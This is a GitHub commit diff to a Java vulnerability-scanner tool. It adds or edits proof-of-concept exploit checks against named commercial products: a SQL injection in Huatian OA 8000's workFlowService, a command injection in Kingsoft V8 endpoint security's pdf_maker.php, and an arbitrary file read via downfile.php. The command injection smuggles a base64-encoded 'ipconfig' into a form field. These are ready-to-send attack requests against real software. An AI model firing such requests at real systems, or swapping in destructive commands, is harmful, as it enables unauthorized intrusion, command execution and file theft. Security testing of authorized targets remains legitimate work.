Init

achuna33 · Jul 12, 2022 · ac8c975 · ac8c975
1 parent 7fcf324
commit ac8c975
Show file tree

Hide file tree

Showing 2 changed files with 53 additions and 3 deletions.
diff --git a/src/main/java/com/achuna33/Controllers/HuaTianController.java b/src/main/java/com/achuna33/Controllers/HuaTianController.java
@@ -10,19 +10,20 @@
 public class HuaTianController extends Controller implements BasicController{
     @VulnerabilityDescriptionMapping(Description="华天动力OA 8000版 workFlowService SQL注入漏洞" ,SupportVulType= SupportVul.SQLInjection)
     public void vul_Getfile(Poc_Exp type, String target, Object... args) throws Exception {
-        Cache.uiController.logTextArea.appendText("\n开始检测：  一米OA getfile.jsp 任意文件读取漏洞");
+        Cache.uiController.logTextArea.appendText("\n开始检测：  华天动力OA 8000版 workFlowService SQL注入漏洞");
 
         switch (type){
             case EXP:
                 break;
             case POC:
                 String data = "<buffalo-call> \n" +
                         "<method>getDataListForTree</method> \n" +
-                        "<string>select user()</string> \n" +
+                        "<string>select 'flag';</string> \n" +
                         "</buffalo-call>";
                 HttpRequest httpRequest = new HttpRequest(target+"/OAapp/bfapp/buffalo/workFlowService");
+                httpRequest.addHeaders("Content-type"," ");
                 Response result = httpRequest.Post(data);
-                if(result.responseBody.contains("buffalo")&&result.statusCode==200){
+                if(result.responseBody.contains("flag")&&result.statusCode==200){
                     WriteLog(" 存在漏洞");
                     WriteLog(result.responseBody);
                 }else {

diff --git a/src/main/java/com/achuna33/Controllers/JinShanController.java b/src/main/java/com/achuna33/Controllers/JinShanController.java
@@ -0,0 +1,49 @@
+package com.achuna33.Controllers;
+
+import com.achuna33.SupportType.Poc_Exp;
+import com.achuna33.SupportType.SupportVul;
+import com.achuna33.Utils.Cache;
+import com.achuna33.Utils.HttpRequest;
+import com.achuna33.Utils.Response;
+
+@BasicMapping(uri = "金山V8")
+public class JinShanController extends Controller implements BasicController{
+    @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞" ,SupportVulType= SupportVul.RuntimeExec)
+    public void vul_pdf_maker(Poc_Exp type, String target, Object... args) throws Exception {
+        Cache.uiController.logTextArea.appendText("\n开始检测：  金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞");
+
+        switch (type){
+            case EXP:
+                break;
+            case POC:
+                String data = "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx";
+                HttpRequest httpRequest = new HttpRequest(target+"/inter/pdf_maker.php");
+                Response result = httpRequest.Post(data);
+                if(result.responseBody.contains("Windows")&&result.statusCode==200){
+                    WriteLog(" 存在漏洞");
+                    WriteLog(result.responseBody);
+                }else {
+                    WriteLog(" 不存在漏洞");
+                }
+        }
+    }
+    @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 downfile.php 任意文件读取漏洞" ,SupportVulType= SupportVul.RuntimeExec)
+    public void vul_downfile(Poc_Exp type, String target, Object... args) throws Exception {
+        Cache.uiController.logTextArea.appendText("\n开始检测：  金山 V8 终端安全系统 downfile.php 任意文件读取漏洞");
+
+        switch (type){
+            case EXP:
+                break;
+            case POC:
+                HttpRequest httpRequest = new HttpRequest(target+"/htmltopdf/downfile.php?filename=downfile.php");
+                Response result = httpRequest.Get("");
+                if(result.responseBody.contains("<?php")&&result.statusCode==200){
+                    WriteLog(" 存在漏洞");
+                    WriteLog(result.responseBody);
+                }else {
+                    WriteLog(" 不存在漏洞");
+                }
+        }
+    }
+
+    }